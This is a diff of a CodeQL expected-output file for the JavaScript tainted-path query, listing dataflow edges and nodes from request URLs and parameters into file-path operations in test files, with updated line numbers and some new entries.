TaintedPath.js:163:29:163:32 | path | provenance | | -| TaintedPath.js:150:7:150:48 | path | TaintedPath.js:178:40:178:43 | path | provenance | | -| TaintedPath.js:150:7:150:48 | path | TaintedPath.js:179:50:179:53 | path | provenance | | -| TaintedPath.js:150:14:150:37 | url.par ... , true) | TaintedPath.js:150:14:150:43 | url.par ... ).query | provenance | Config | -| TaintedPath.js:150:14:150:43 | url.par ... ).query | TaintedPath.js:150:14:150:48 | url.par ... ry.path | provenance | Config | -| TaintedPath.js:150:14:150:48 | url.par ... ry.path | TaintedPath.js:150:7:150:48 | path | provenance | | -| TaintedPath.js:150:24:150:30 | req.url | TaintedPath.js:150:14:150:37 | url.par ... , true) | provenance | Config | -| TaintedPath.js:154:29:154:32 | path | TaintedPath.js:154:29:154:55 | path.re ... /g, '') | provenance | Config | -| TaintedPath.js:160:29:160:32 | path | TaintedPath.js:160:29:160:52 | path.re ... /g, '') | provenance | Config | -| TaintedPath.js:161:29:161:32 | path | TaintedPath.js:161:29:161:53 | path.re ... /g, '') | provenance | Config | -| TaintedPath.js:162:29:162:32 | path | TaintedPath.js:162:29:162:51 | path.re ... /g, '') | provenance | Config | -| TaintedPath.js:163:29:163:32 | path | TaintedPath.js:163:29:163:57 | path.re ... /g, '') | provenance | Config | -| TaintedPath.js:178:40:178:43 | path | TaintedPath.js:178:40:178:73 | path.re ... +/, '') | provenance | Config | -| TaintedPath.js:178:40:178:73 | path.re ... +/, '') | TaintedPath.js:178:29:178:73 | "prefix ... +/, '') | provenance | Config | -| TaintedPath.js:179:29:179:54 | pathMod ... e(path) | TaintedPath.js:179:29:179:84 | pathMod ... +/, '') | provenance | Config | -| TaintedPath.js:179:50:179:53 | path | TaintedPath.js:179:29:179:54 | pathMod ... e(path) | provenance | Config | -| TaintedPath.js:187:29:187:45 | qs.parse(req.url) | TaintedPath.js:187:29:187:49 | qs.pars ... rl).foo | provenance | Config | -| TaintedPath.js:187:38:187:44 | req.url | TaintedPath.js:187:29:187:45 | qs.parse(req.url) | provenance | Config | -| TaintedPath.js:188:29:188:59 | qs.pars ... q.url)) | TaintedPath.js:188:29:188:63 | qs.pars ... l)).foo | provenance | Config | -| TaintedPath.js:188:38:188:58 | normali ... eq.url) | TaintedPath.js:188:29:188:59 | qs.pars ... q.url)) | provenance | Config | -| TaintedPath.js:188:51:188:57 | req.url | TaintedPath.js:188:38:188:58 | normali ... eq.url) | provenance | Config | -| TaintedPath.js:190:29:190:51 | parseqs ... eq.url) | TaintedPath.js:190:29:190:55 | parseqs ... rl).foo | provenance | Config | -| TaintedPath.js:190:44:190:50 | req.url | TaintedPath.js:190:29:190:51 | parseqs ... eq.url) | provenance | Config | -| TaintedPath.js:195:7:195:48 | path | TaintedPath.js:196:31:196:34 | path | provenance | | -| TaintedPath.js:195:7:195:48 | path | TaintedPath.js:197:45:197:48 | path | provenance | | -| TaintedPath.js:195:7:195:48 | path | TaintedPath.js:198:35:198:38 | path | provenance | | -| TaintedPath.js:195:14:195:37 | url.par ... , true) | TaintedPath.js:195:14:195:43 | url.par ... ).query | provenance | Config | -| TaintedPath.js:195:14:195:43 | url.par ... ).query | TaintedPath.js:195:14:195:48 | url.par ... ry.path | provenance | Config | -| TaintedPath.js:195:14:195:48 | url.par ... ry.path | TaintedPath.js:195:7:195:48 | path | provenance | | -| TaintedPath.js:195:24:195:30 | req.url | TaintedPath.js:195:14:195:37 | url.par ... , true) | provenance | Config | -| TaintedPath.js:202:7:202:48 | path | TaintedPath.js:206:29:206:32 | path | provenance | | -| TaintedPath.js:202:14:202:37 | url.par ... , true) | TaintedPath.js:202:14:202:43 | url.par ... ).query | provenance | Config | -| TaintedPath.js:202:14:202:43 | url.par ... ).query | TaintedPath.js:202:14:202:48 | url.par ... ry.path | provenance | Config | -| TaintedPath.js:202:14:202:48 | url.par ... ry.path | TaintedPath.js:202:7:202:48 | path | provenance | | -| TaintedPath.js:202:24:202:30 | req.url | TaintedPath.js:202:14:202:37 | url.par ... , true) | provenance | Config | -| TaintedPath.js:206:29:206:32 | path | TaintedPath.js:206:29:206:85 | path.re ... '), '') | provenance | Config | -| TaintedPath.js:211:7:211:48 | path | TaintedPath.js:213:29:213:32 | path | provenance | | -| TaintedPath.js:211:7:211:48 | path | TaintedPath.js:216:31:216:34 | path | provenance | | -| TaintedPath.js:211:14:211:37 | url.par ... , true) | TaintedPath.js:211:14:211:43 | url.par ... ).query | provenance | Config | -| TaintedPath.js:211:14:211:43 | url.par ... ).query | TaintedPath.js:211:14:211:48 | url.par ... ry.path | provenance | Config | -| TaintedPath.js:211:14:211:48 | url.par ... ry.path | TaintedPath.js:211:7:211:48 | path | provenance | | -| TaintedPath.js:211:24:211:30 | req.url | TaintedPath.js:211:14:211:37 | url.par ... , true) | provenance | Config | -| TaintedPath.js:213:29:213:32 | path | TaintedPath.js:213:29:213:68 | path.re ... '), '') | provenance | Config | -| TaintedPath.js:216:31:216:34 | path | TaintedPath.js:216:31:216:69 | path.re ... '), '') | provenance | Config | -| examples/TaintedPath.js:8:7:8:52 | filePath | examples/TaintedPath.js:11:36:11:43 | filePath | provenance | | +| TaintedPath.js:13:45:13:48 | path | TaintedPath.js:13:29:13:48 | "/home/user/" + path | provenance | Config | +| TaintedPath.js:36:3:36:44 | path | TaintedPath.js:39:48:39:51 | path | provenance | | +| TaintedPath.js:36:3:36:44 | path | TaintedPath.js:42:45:42:48 | path | provenance | | +| TaintedPath.js:36:3:36:44 | path | TaintedPath.js:43:51:43:54 | path | provenance | | +| TaintedPath.js:36:3:36:44 | path | TaintedPath.js:44:50:44:53 | path | provenance | | +| TaintedPath.js:36:3:36:44 | path | TaintedPath.js:45:52:45:55 | path | provenance | | +| TaintedPath.js:36:3:36:44 | path | TaintedPath.js:46:49:46:52 | path | provenance | | +| TaintedPath.js:36:3:36:44 | path | TaintedPath.js:47:48:47:51 | path | provenance | | +| TaintedPath.js:36:3:36:44 | path | TaintedPath.js:48:54:48:57 | path | provenance | | +| TaintedPath.js:36:3:36:44 | path | TaintedPath.js:49:57:49:60 | path | provenance | | +| TaintedPath.js:36:10:36:33 | url.par ... , true) | TaintedPath.js:36:10:36:39 | url.par ... ).query | provenance | Config | +| TaintedPath.js:36:10:36:39 | url.par ... ).query | TaintedPath.js:36:10:36:44 | url.par ... ry.path | provenance | Config | +| TaintedPath.js:36:10:36:44 | url.par ... ry.path | TaintedPath.js:36:3:36:44 | path | provenance | | +| TaintedPath.js:36:20:36:26 | req.url | TaintedPath.js:36:10:36:33 | url.par ... , true) | provenance | Config | +| TaintedPath.js:39:48:39:51 | path | TaintedPath.js:39:29:39:52 | pathMod ... e(path) | provenance | Config | +| TaintedPath.js:42:45:42:48 | path | TaintedPath.js:42:29:42:49 | pathMod ... n(path) | provenance | Config | +| TaintedPath.js:43:51:43:54 | path | TaintedPath.js:43:29:43:58 | pathMod ... ath, z) | provenance | Config | +| TaintedPath.js:44:50:44:53 | path | TaintedPath.js:44:29:44:54 | pathMod ... e(path) | provenance | Config | +| TaintedPath.js:45:52:45:55 | path | TaintedPath.js:45:29:45:56 | pathMod ... , path) | provenance | Config | +| TaintedPath.js:46:49:46:52 | path | TaintedPath.js:46:29:46:56 | pathMod ... ath, x) | provenance | Config | +| TaintedPath.js:47:48:47:51 | path | TaintedPath.js:47:29:47:52 | pathMod ... e(path) | provenance | Config | +| TaintedPath.js:48:54:48:57 | path | TaintedPath.js:48:29:48:61 | pathMod ... ath, z) | provenance | Config | +| TaintedPath.js:49:57:49:60 | path | TaintedPath.js:49:29:49:61 | pathMod ... h(path) | provenance | Config | +| TaintedPath.js:54:31:54:70 | require ... eq.url) | TaintedPath.js:54:31:54:76 | require ... ).query | provenance | Config | +| TaintedPath.js:54:63:54:69 | req.url | TaintedPath.js:54:31:54:70 | require ... eq.url) | provenance | Config | +| TaintedPath.js:55:31:55:68 | require ... eq.url) | TaintedPath.js:55:31:55:74 | require ... ).query | provenance | Config | +| TaintedPath.js:55:61:55:67 | req.url | TaintedPath.js:55:31:55:68 | require ... eq.url) | provenance | Config | +| TaintedPath.js:56:31:56:67 | require ... eq.url) | TaintedPath.js:56:31:56:73 | require ... ).query | provenance | Config | +| TaintedPath.js:56:60:56:66 | req.url | TaintedPath.js:56:31:56:67 | require ... eq.url) | provenance | Config | +| TaintedPath.js:73:6:73:47 | path | TaintedPath.js:75:44:75:47 | path | provenance | | +| TaintedPath.js:73:6:73:47 | path | TaintedPath.js:76:14:76:17 | path | provenance | | +| TaintedPath.js:73:13:73:36 | url.par ... , true) | TaintedPath.js:73:13:73:42 | url.par ... ).query | provenance | Config | +| TaintedPath.js:73:13:73:42 | url.par ... ).query | TaintedPath.js:73:13:73:47 | url.par ... ry.path | provenance | Config | +| TaintedPath.js:73:13:73:47 | url.par ... ry.path | TaintedPath.js:73:6:73:47 | path | provenance | | +| TaintedPath.js:73:23:73:29 | req.url | TaintedPath.js:73:13:73:36 | url.par ... , true) | provenance | Config | +| TaintedPath.js:75:44:75:47 | path | TaintedPath.js:75:28:75:48 | fs.real ... c(path) | provenance | Config | +| TaintedPath.js:76:14:76:17 | path | TaintedPath.js:77:32:77:39 | realpath | provenance | Config | +| TaintedPath.js:77:32:77:39 | realpath | TaintedPath.js:78:45:78:52 | realpath | provenance | | +| TaintedPath.js:109:6:109:47 | path | TaintedPath.js:111:23:111:26 | path | provenance | | +| TaintedPath.js:109:13:109:36 | url.par ... , true) | TaintedPath.js:109:13:109:42 | url.par ... ).query | provenance | Config | +| TaintedPath.js:109:13:109:42 | url.par ... ).query | TaintedPath.js:109:13:109:47 | url.par ... ry.path | provenance | Config | +| TaintedPath.js:109:13:109:47 | url.par ... ry.path | TaintedPath.js:109:6:109:47 | path | provenance | | +| TaintedPath.js:109:23:109:29 | req.url | TaintedPath.js:109:13:109:36 | url.par ... , true) | provenance | Config | +| TaintedPath.js:115:7:115:48 | path | TaintedPath.js:117:19:117:22 | path | provenance | | +| TaintedPath.js:115:7:115:48 | path | TaintedPath.js:119:15:119:18 | path | provenance | | +| TaintedPath.js:115:14:115:37 | url.par ... , true) | TaintedPath.js:115:14:115:43 | url.par ... ).query | provenance | Config | +| TaintedPath.js:115:14:115:43 | url.par ... ).query | TaintedPath.js:115:14:115:48 | url.par ... ry.path | provenance | Config | +| TaintedPath.js:115:14:115:48 | url.par ... ry.path | TaintedPath.js:115:7:115:48 | path | provenance | | +| TaintedPath.js:115:24:115:30 | req.url | TaintedPath.js:115:14:115:37 | url.par ... , true) | provenance | Config | +| TaintedPath.js:119:7:119:29 | split | TaintedPath.js:121:19:121:23 | split | provenance | | +| TaintedPath.js:119:7:119:29 | split | TaintedPath.js:125:19:125:23 | split | provenance | | +| TaintedPath.js:119:7:119:29 | split | TaintedPath.js:126:28:126:32 | split | provenance | | +| TaintedPath.js:119:7:119:29 | split | TaintedPath.js:128:33:128:37 | split | provenance | | +| TaintedPath.js:119:7:119:29 | split | TaintedPath.js:131:20:131:24 | split | provenance | | +| TaintedPath.js:119:7:119:29 | split | TaintedPath.js:134:19:134:23 | split | provenance | | +| TaintedPath.js:119:15:119:18 | path | TaintedPath.js:119:15:119:29 | path.split("/") | provenance | Config | +| TaintedPath.js:119:15:119:29 | path.split("/") | TaintedPath.js:119:7:119:29 | split | provenance | | +| TaintedPath.js:121:19:121:23 | split | TaintedPath.js:121:19:121:33 | split.join("/") | provenance | Config | +| TaintedPath.js:125:19:125:23 | split | TaintedPath.js:125:19:125:26 | split[x] | provenance | Config | +| TaintedPath.js:126:28:126:32 | split | TaintedPath.js:126:28:126:35 | split[x] | provenance | Config | +| TaintedPath.js:126:28:126:35 | split[x] | TaintedPath.js:126:19:126:35 | prefix + split[x] | provenance | Config | +| TaintedPath.js:128:7:128:38 | concatted | TaintedPath.js:129:19:129:27 | concatted | provenance | | +| TaintedPath.js:128:19:128:38 | prefix.concat(split) | TaintedPath.js:128:7:128:38 | concatted | provenance | | +| TaintedPath.js:128:33:128:37 | split | TaintedPath.js:128:19:128:38 | prefix.concat(split) | provenance | Config | +| TaintedPath.js:129:19:129:27 | concatted | TaintedPath.js:129:19:129:37 | concatted.join("/") | provenance | Config | +| TaintedPath.js:131:7:131:39 | concatted2 | TaintedPath.js:132:19:132:28 | concatted2 | provenance | | +| TaintedPath.js:131:20:131:24 | split | TaintedPath.js:131:20:131:39 | split.concat(prefix) | provenance | Config | +| TaintedPath.js:131:20:131:39 | split.concat(prefix) | TaintedPath.js:131:7:131:39 | concatted2 | provenance | | +| TaintedPath.js:132:19:132:28 | concatted2 | TaintedPath.js:132:19:132:38 | concatted2.join("/") | provenance | Config | +| TaintedPath.js:134:19:134:23 | split | TaintedPath.js:134:19:134:29 | split.pop() | provenance | Config | +| TaintedPath.js:139:7:139:48 | path | TaintedPath.js:143:29:143:32 | path | provenance | | +| TaintedPath.js:139:7:139:48 | path | TaintedPath.js:149:29:149:32 | path | provenance | | +| TaintedPath.js:139:7:139:48 | path | TaintedPath.js:150:29:150:32 | path | provenance | | +| TaintedPath.js:139:7:139:48 | path | TaintedPath.js:151:29:151:32 | path | provenance | | +| TaintedPath.js:139:7:139:48 | path | TaintedPath.js:152:29:152:32 | path | provenance | | +| TaintedPath.js:139:7:139:48 | path | TaintedPath.js:167:40:167:43 | path | provenance | | +| TaintedPath.js:139:7:139:48 | path | TaintedPath.js:168:50:168:53 | path | provenance | | +| TaintedPath.js:139:14:139:37 | url.par ... , true) | TaintedPath.js:139:14:139:43 | url.par ... ).query | provenance | Config | +| TaintedPath.js:139:14:139:43 | url.par ... ).query | TaintedPath.js:139:14:139:48 | url.par ... ry.path | provenance | Config | +| TaintedPath.js:139:14:139:48 | url.par ... ry.path | TaintedPath.js:139:7:139:48 | path | provenance | | +| TaintedPath.js:139:24:139:30 | req.url | TaintedPath.js:139:14:139:37 | url.par ... , true) | provenance | Config | +| TaintedPath.js:143:29:143:32 | path | TaintedPath.js:143:29:143:55 | path.re ... /g, '') | provenance | Config | +| TaintedPath.js:149:29:149:32 | path | TaintedPath.js:149:29:149:52 | path.re ... /g, '') | provenance | Config | +| TaintedPath.js:150:29:150:32 | path | TaintedPath.js:150:29:150:53 | path.re ... /g, '') | provenance | Config | +| TaintedPath.js:151:29:151:32 | path | TaintedPath.js:151:29:151:51 | path.re ... /g, '') | provenance | Config | +| TaintedPath.js:152:29:152:32 | path | TaintedPath.js:152:29:152:57 | path.re ... /g, '') | provenance | Config | +| TaintedPath.js:167:40:167:43 | path | TaintedPath.js:167:40:167:73 | path.re ... +/, '') | provenance | Config | +| TaintedPath.js:167:40:167:73 | path.re ... +/, '') | TaintedPath.js:167:29:167:73 | "prefix ... +/, '') | provenance | Config | +| TaintedPath.js:168:29:168:54 | pathMod ... e(path) | TaintedPath.js:168:29:168:84 | pathMod ... +/, '') | provenance | Config | +| TaintedPath.js:168:50:168:53 | path | TaintedPath.js:168:29:168:54 | pathMod ... e(path) | provenance | Config | +| TaintedPath.js:176:29:176:45 | qs.parse(req.url) | TaintedPath.js:176:29:176:49 | qs.pars ... rl).foo | provenance | Config | +| TaintedPath.js:176:38:176:44 | req.url | TaintedPath.js:176:29:176:45 | qs.parse(req.url) | provenance | Config | +| TaintedPath.js:177:29:177:59 | qs.pars ... q.url)) | TaintedPath.js:177:29:177:63 | qs.pars ... l)).foo | provenance | Config | +| TaintedPath.js:177:38:177:58 | normali ... eq.url) | TaintedPath.js:177:29:177:59 | qs.pars ... q.url)) | provenance | Config | +| TaintedPath.js:177:51:177:57 | req.url | TaintedPath.js:177:38:177:58 | normali ... eq.url) | provenance | Config | +| TaintedPath.js:179:29:179:51 | parseqs ... eq.url) | TaintedPath.js:179:29:179:55 | parseqs ... rl).foo | provenance | Config | +| TaintedPath.js:179:44:179:50 | req.url | TaintedPath.js:179:29:179:51 | parseqs ... eq.url) | provenance | Config | +| TaintedPath.js:184:7:184:48 | path | TaintedPath.js:185:31:185:34 | path | provenance | | +| TaintedPath.js:184:7:184:48 | path | TaintedPath.js:186:45:186:48 | path | provenance | | +| TaintedPath.js:184:7:184:48 | path | TaintedPath.js:187:35:187:38 | path | provenance | | +| TaintedPath.js:184:14:184:37 | url.par ... , true) | TaintedPath.js:184:14:184:43 | url.par ... ).query | provenance | Config | +| TaintedPath.js:184:14:184:43 | url.par ... ).query | TaintedPath.js:184:14:184:48 | url.par ... ry.path | provenance | Config | +| TaintedPath.js:184:14:184:48 | url.par ... ry.path | TaintedPath.js:184:7:184:48 | path | provenance | | +| TaintedPath.js:184:24:184:30 | req.url | TaintedPath.js:184:14:184:37 | url.par ... , true) | provenance | Config | +| TaintedPath.js:191:7:191:48 | path | TaintedPath.js:195:29:195:32 | path | provenance | | +| TaintedPath.js:191:14:191:37 | url.par ... , true) | TaintedPath.js:191:14:191:43 | url.par ... ).query | provenance | Config | +| TaintedPath.js:191:14:191:43 | url.par ... ).query | TaintedPath.js:191:14:191:48 | url.par ... ry.path | provenance | Config | +| TaintedPath.js:191:14:191:48 | url.par ... ry.path | TaintedPath.js:191:7:191:48 | path | provenance | | +| TaintedPath.js:191:24:191:30 | req.url | TaintedPath.js:191:14:191:37 | url.par ... , true) | provenance | Config | +| TaintedPath.js:195:29:195:32 | path | TaintedPath.js:195:29:195:85 | path.re ... '), '') | provenance | Config | +| TaintedPath.js:200:7:200:48 | path | TaintedPath.js:202:29:202:32 | path | provenance | | +| TaintedPath.js:200:7:200:48 | path | TaintedPath.js:205:31:205:34 | path | provenance | | +| TaintedPath.js:200:14:200:37 | url.par ... , true) | TaintedPath.js:200:14:200:43 | url.par ... ).query | provenance | Config | +| TaintedPath.js:200:14:200:43 | url.par ... ).query | TaintedPath.js:200:14:200:48 | url.par ... ry.path | provenance | Config | +| TaintedPath.js:200:14:200:48 | url.par ... ry.path | TaintedPath.js:200:7:200:48 | path | provenance | | +| TaintedPath.js:200:24:200:30 | req.url | TaintedPath.js:200:14:200:37 | url.par ... , true) | provenance | Config | +| TaintedPath.js:202:29:202:32 | path | TaintedPath.js:202:29:202:68 | path.re ... '), '') | provenance | Config | +| TaintedPath.js:205:31:205:34 | path | TaintedPath.js:205:31:205:69 | path.re ... '), '') | provenance | Config | +| TaintedPath.js:212:7:212:48 | path | TaintedPath.js:213:33:213:36 | path | provenance | | +| TaintedPath.js:212:7:212:48 | path | TaintedPath.js:215:36:215:39 | path | provenance | | +| TaintedPath.js:212:14:212:37 | url.par ... , true) | TaintedPath.js:212:14:212:43 | url.par ... ).query | provenance | Config | +| TaintedPath.js:212:14:212:43 | url.par ... ).query | TaintedPath.js:212:14:212:48 | url.par ... ry.path | provenance | Config | +| TaintedPath.js:212:14:212:48 | url.par ... ry.path | TaintedPath.js:212:7:212:48 | path | provenance | | +| TaintedPath.js:212:24:212:30 | req.url | TaintedPath.js:212:14:212:37 | url.par ... , true) | provenance | Config | +| TaintedPath.js:213:9:213:37 | improperEscape | TaintedPath.js:214:29:214:42 | improperEscape | provenance | | +| TaintedPath.js:213:26:213:37 | escape(path) | TaintedPath.js:213:9:213:37 | improperEscape | provenance | | +| TaintedPath.js:213:33:213:36 | path | TaintedPath.js:213:26:213:37 | escape(path) | provenance | Config | +| TaintedPath.js:215:9:215:40 | improperEscape2 | TaintedPath.js:216:29:216:43 | improperEscape2 | provenance | | +| TaintedPath.js:215:27:215:40 | unescape(path) | TaintedPath.js:215:9:215:40 | improperEscape2 | provenance | | +| TaintedPath.js:215:36:215:39 | path | TaintedPath.js:215:27:215:40 | unescape(path) | provenance | Config | +| examples/TaintedPath.js:8:7:8:52 | filePath | examples/TaintedPath.js:10:36:10:43 | filePath | provenance | | | examples/TaintedPath.js:8:18:8:41 | url.par ... , true) | examples/TaintedPath.js:8:18:8:47 | url.par ... ).query | provenance | Config | | examples/TaintedPath.js:8:18:8:47 | url.par ... ).query | examples/TaintedPath.js:8:18:8:52 | url.par ... ry.path | provenance | Config | | examples/TaintedPath.js:8:18:8:52 | url.par ... ry.path | examples/TaintedPath.js:8:7:8:52 | filePath | provenance | | | examples/TaintedPath.js:8:28:8:34 | req.url | examples/TaintedPath.js:8:18:8:41 | url.par ... , true) | provenance | Config | -| examples/TaintedPath.js:11:36:11:43 | filePath | examples/TaintedPath.js:11:29:11:43 | ROOT + filePath | provenance | Config | +| examples/TaintedPath.js:10:36:10:43 | filePath | examples/TaintedPath.js:10:29:10:43 | ROOT + filePath | provenance | Config | | handlebars.js:10:51:10:58 | filePath | handlebars.js:11:32:11:39 | filePath | provenance | | | handlebars.js:13:73:13:80 | filePath | handlebars.js:15:25:15:32 | filePath | provenance | | | handlebars.js:29:46:29:60 | req.params.path | handlebars.js:10:51:10:58 | filePath | provenance | | | handlebars.js:43:15:43:29 | req.params.path | handlebars.js:13:73:13:80 | filePath | provenance | | +| hapi.js:14:19:14:51 | filepath | hapi.js:15:44:15:51 | filepath | provenance | | +| hapi.js:14:30:14:51 | request ... ilepath | hapi.js:14:19:14:51 | filepath | provenance | | +| more-fs-extra.js:8:11:8:22 | { filename } | more-fs-extra.js:8:13:8:20 | filename | provenance | Config | +| more-fs-extra.js:8:11:8:33 | filename | more-fs-extra.js:10:15:10:22 | filename | provenance | | +| more-fs-extra.js:8:11:8:33 | filename | more-fs-extra.js:11:11:11:18 | filename | provenance | | +| more-fs-extra.js:8:11:8:33 | filename | more-fs-extra.js:12:14:12:21 | filename | provenance | | +| more-fs-extra.js:8:11:8:33 | filename | more-fs-extra.js:13:18:13:25 | filename | provenance | | +| more-fs-extra.js:8:11:8:33 | filename | more-fs-extra.js:14:11:14:18 | filename | provenance | | +| more-fs-extra.js:8:11:8:33 | filename | more-fs-extra.js:15:21:15:28 | filename | provenance | | +| more-fs-extra.js:8:11:8:33 | filename | more-fs-extra.js:16:21:16:28 | filename | provenance | | +| more-fs-extra.js:8:11:8:33 | filename | more-fs-extra.js:17:31:17:38 | filename | provenance | | +| more-fs-extra.js:8:11:8:33 | filename | more-fs-extra.js:18:15:18:22 | filename | provenance | | +| more-fs-extra.js:8:11:8:33 | filename | more-fs-extra.js:19:25:19:32 | filename | provenance | | +| more-fs-extra.js:8:11:8:33 | filename | more-fs-extra.js:20:21:20:28 | filename | provenance | | +| more-fs-extra.js:8:11:8:33 | filename | more-fs-extra.js:21:17:21:24 | filename | provenance | | +| more-fs-extra.js:8:11:8:33 | filename | more-fs-extra.js:22:16:22:23 | filename | provenance | | +| more-fs-extra.js:8:11:8:33 | filename | more-fs-extra.js:23:20:23:27 | filename | provenance | | +| more-fs-extra.js:8:11:8:33 | filename | more-fs-extra.js:24:19:24:26 | filename | provenance | | +| more-fs-extra.js:8:11:8:33 | filename | more-fs-extra.js:25:15:25:22 | filename | provenance | | +| more-fs-extra.js:8:11:8:33 | filename | more-fs-extra.js:26:19:26:26 | filename | provenance | | +| more-fs-extra.js:8:11:8:33 | filename | more-fs-extra.js:27:13:27:20 | filename | provenance | | +| more-fs-extra.js:8:11:8:33 | filename | more-fs-extra.js:28:17:28:24 | filename | provenance | | +| more-fs-extra.js:8:11:8:33 | filename | more-fs-extra.js:29:23:29:30 | filename | provenance | | +| more-fs-extra.js:8:11:8:33 | filename | more-fs-extra.js:30:16:30:23 | filename | provenance | | +| more-fs-extra.js:8:11:8:33 | filename | more-fs-extra.js:31:20:31:27 | filename | provenance | | +| more-fs-extra.js:8:11:8:33 | filename | more-fs-extra.js:32:23:32:30 | filename | provenance | | +| more-fs-extra.js:8:13:8:20 | filename | more-fs-extra.js:8:11:8:33 | filename | provenance | | +| more-fs-extra.js:8:26:8:33 | req.body | more-fs-extra.js:8:11:8:22 | { filename } | provenance | | | normalizedPaths.js:11:7:11:27 | path | normalizedPaths.js:13:19:13:22 | path | provenance | | | normalizedPaths.js:11:7:11:27 | path | normalizedPaths.js:14:26:14:29 | path | provenance | | | normalizedPaths.js:11:7:11:27 | path | normalizedPaths.js:15:19:15:22 | path | provenance | | @@ -899,10 +635,10 @@ edges | tainted-promise-steps.js:11:25:11:35 | pathPromise [PromiseValue] | tainted-promise-steps.js:11:19:11:35 | await pathPromise | provenance | | | tainted-promise-steps.js:12:3:12:13 | pathPromise [PromiseValue] | tainted-promise-steps.js:12:20:12:23 | path | provenance | | | tainted-promise-steps.js:12:20:12:23 | path | tainted-promise-steps.js:12:44:12:47 | path | provenance | | -| tainted-sendFile.js:24:37:24:48 | req.params.x | tainted-sendFile.js:24:16:24:49 | path.re ... rams.x) | provenance | Config | -| tainted-sendFile.js:25:34:25:45 | req.params.x | tainted-sendFile.js:25:16:25:46 | path.jo ... rams.x) | provenance | Config | -| tainted-sendFile.js:33:37:33:48 | req.params.x | tainted-sendFile.js:33:16:33:48 | homeDir ... arams.x | provenance | Config | -| tainted-sendFile.js:35:34:35:45 | req.params.x | tainted-sendFile.js:35:16:35:46 | path.jo ... rams.x) | provenance | Config | +| tainted-sendFile.js:21:37:21:48 | req.params.x | tainted-sendFile.js:21:16:21:49 | path.re ... rams.x) | provenance | Config | +| tainted-sendFile.js:22:34:22:45 | req.params.x | tainted-sendFile.js:22:16:22:46 | path.jo ... rams.x) | provenance | Config | +| tainted-sendFile.js:28:37:28:48 | req.params.x | tainted-sendFile.js:28:16:28:48 | homeDir ... arams.x | provenance | Config | +| tainted-sendFile.js:30:34:30:45 | req.params.x | tainted-sendFile.js:30:16:30:46 | path.jo ... rams.x) | provenance | Config | | tainted-string-steps.js:6:7:6:48 | path | tainted-string-steps.js:8:18:8:21 | path | provenance | | | tainted-string-steps.js:6:7:6:48 | path | tainted-string-steps.js:9:18:9:21 | path | provenance | | | tainted-string-steps.js:6:7:6:48 | path | tainted-string-steps.js:10:18:10:21 | path | provenance | | @@ -944,205 +680,578 @@ edges | torrents.js:6:6:6:45 | loc | torrents.js:7:25:7:27 | loc | provenance | | | torrents.js:6:12:6:45 | dir + " ... t.data" | torrents.js:6:6:6:45 | loc | provenance | | | torrents.js:6:24:6:27 | name | torrents.js:6:12:6:45 | dir + " ... t.data" | provenance | Config | -| typescript.ts:9:7:9:48 | path | typescript.ts:12:29:12:32 | path | provenance | | -| typescript.ts:9:7:9:48 | path | typescript.ts:20:15:20:18 | path | provenance | | -| typescript.ts:9:7:9:48 | path | typescript.ts:23:15:23:18 | path | provenance | | -| typescript.ts:9:7:9:48 | path | typescript.ts:30:15:30:18 | path | provenance | | +| typescript.ts:9:7:9:48 | path | typescript.ts:11:29:11:32 | path | provenance | | +| typescript.ts:9:7:9:48 | path | typescript.ts:19:15:19:18 | path | provenance | | +| typescript.ts:9:7:9:48 | path | typescript.ts:22:15:22:18 | path | provenance | | +| typescript.ts:9:7:9:48 | path | typescript.ts:29:15:29:18 | path | provenance | | | typescript.ts:9:14:9:37 | url.par ... , true) | typescript.ts:9:14:9:43 | url.par ... ).query | provenance | Config | | typescript.ts:9:14:9:43 | url.par ... ).query | typescript.ts:9:14:9:48 | url.par ... ry.path | provenance | Config | | typescript.ts:9:14:9:48 | url.par ... ry.path | typescript.ts:9:7:9:48 | path | provenance | | | typescript.ts:9:24:9:30 | req.url | typescript.ts:9:14:9:37 | url.par ... , true) | provenance | Config | -| typescript.ts:20:7:20:18 | path3 | typescript.ts:21:39:21:43 | path3 | provenance | | -| typescript.ts:20:15:20:18 | path | typescript.ts:20:7:20:18 | path3 | provenance | | -| typescript.ts:23:7:23:18 | path4 | typescript.ts:24:39:24:43 | path4 | provenance | | -| typescript.ts:23:15:23:18 | path | typescript.ts:23:7:23:18 | path4 | provenance | | -| typescript.ts:30:7:30:18 | path6 | typescript.ts:32:29:32:33 | path6 | provenance | | -| typescript.ts:30:15:30:18 | path | typescript.ts:30:7:30:18 | path6 | provenance | | +| typescript.ts:19:7:19:18 | path3 | typescript.ts:20:39:20:43 | path3 | provenance | | +| typescript.ts:19:15:19:18 | path | typescript.ts:19:7:19:18 | path3 | provenance | | +| typescript.ts:22:7:22:18 | path4 | typescript.ts:23:39:23:43 | path4 | provenance | | +| typescript.ts:22:15:22:18 | path | typescript.ts:22:7:22:18 | path4 | provenance | | +| typescript.ts:29:7:29:18 | path6 | typescript.ts:31:29:31:33 | path6 | provenance | | +| typescript.ts:29:15:29:18 | path | typescript.ts:29:7:29:18 | path6 | provenance | | +nodes +| TaintedPath-es6.js:7:7:7:44 | path | semmle.label | path | +| TaintedPath-es6.js:7:14:7:33 | parse(req.url, true) | semmle.label | parse(req.url, true) | +| TaintedPath-es6.js:7:14:7:39 | parse(r ... ).query | semmle.label | parse(r ... ).query | +| TaintedPath-es6.js:7:14:7:44 | parse(r ... ry.path | semmle.label | parse(r ... ry.path | +| TaintedPath-es6.js:7:20:7:26 | req.url | semmle.label | req.url | +| TaintedPath-es6.js:9:26:9:45 | join("public", path) | semmle.label | join("public", path) | +| TaintedPath-es6.js:9:41:9:44 | path | semmle.label | path | +| TaintedPath.js:9:7:9:48 | path | semmle.label | path | +| TaintedPath.js:9:14:9:37 | url.par ... , true) | semmle.label | url.par ... , true) | +| TaintedPath.js:9:14:9:43 | url.par ... ).query | semmle.label | url.par ... ).query | +| TaintedPath.js:9:14:9:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | +| TaintedPath.js:9:24:9:30 | req.url | semmle.label | req.url | +| TaintedPath.js:11:29:11:32 | path | semmle.label | path | +| TaintedPath.js:13:29:13:48 | "/home/user/" + path | semmle.label | "/home/user/" + path | +| TaintedPath.js:13:45:13:48 | path | semmle.label | path | +| TaintedPath.js:16:33:16:36 | path | semmle.label | path | +| TaintedPath.js:19:33:19:36 | path | semmle.label | path | +| TaintedPath.js:22:33:22:36 | path | semmle.label | path | +| TaintedPath.js:31:31:31:34 | path | semmle.label | path | +| TaintedPath.js:36:3:36:44 | path | semmle.label | path | +| TaintedPath.js:36:10:36:33 | url.par ... , true) | semmle.label | url.par ... , true) | +| 